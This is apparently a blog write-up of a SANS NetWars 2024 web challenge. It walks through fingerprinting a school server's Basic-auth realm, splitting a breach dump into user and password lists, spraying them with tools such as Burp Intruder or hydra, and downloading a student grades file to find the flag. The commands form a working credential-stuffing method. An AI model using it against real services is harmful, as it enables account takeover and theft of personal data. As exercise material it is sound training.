← Back to blog

School Admin (Web)

September 9, 2024 · SANS NetWars 2024 webcredential-stuffingbasic-authrecon

Challenge

  • Event: SANS NetWars — Web
  • Category: Web
  • Goal: use a provided breached-credential file to log into a school web server, then recover a flag from the data behind it

Writeup

Recon

Fingerprinting the target shows nginx fronting an HTTP Basic auth realm:

whatweb https://<school-host>/
# [401 Unauthorized] HTTPServer[nginx/1.24.0], WWW-Authenticate[School Administrators Only][Basic]

The prompt: use the attached breached file to credential-stuff the server — which username logs you in? (the valid username has no domain, e.g. asmith, not [email protected]).

Credential stuffing

The breach dump is email:password per line. Split it into username and password lists, stripping the domain from each address:

awk -F '@' '{print $1}' credlist > users.txt
awk -F ':' '{print $2}' credlist > pass.txt

HTTP Basic auth is just a base64-encoded user:pass in the Authorization header, so the lists are sprayed against the realm (e.g. with Burp Intruder over the Authorization: Basic §§ payload position, or ffuf/hydra). One pair returns 200:

jhealy:DramaCoach2024

Looting the data

Authenticated, the admin area exposes a grades export:

wget --header='Authorization: Basic <base64 of jhealy:DramaCoach2024>' \
  https://<school-host>/student-grades.json

The file holds ~673 student records. The flag is tucked into the comment field of one record (PII redacted):

{
  "studentid": "<redacted>",
  "first_name": "<redacted>",
  "last_name": "<redacted>",
  "comment": "Demonstrates an eagerness to learn... NetWars{aqtssigbjEnkoLNwSwQc}."
}

Live session cookies and the full student roster from the original run have been omitted; only the technique and challenge flag are reproduced here.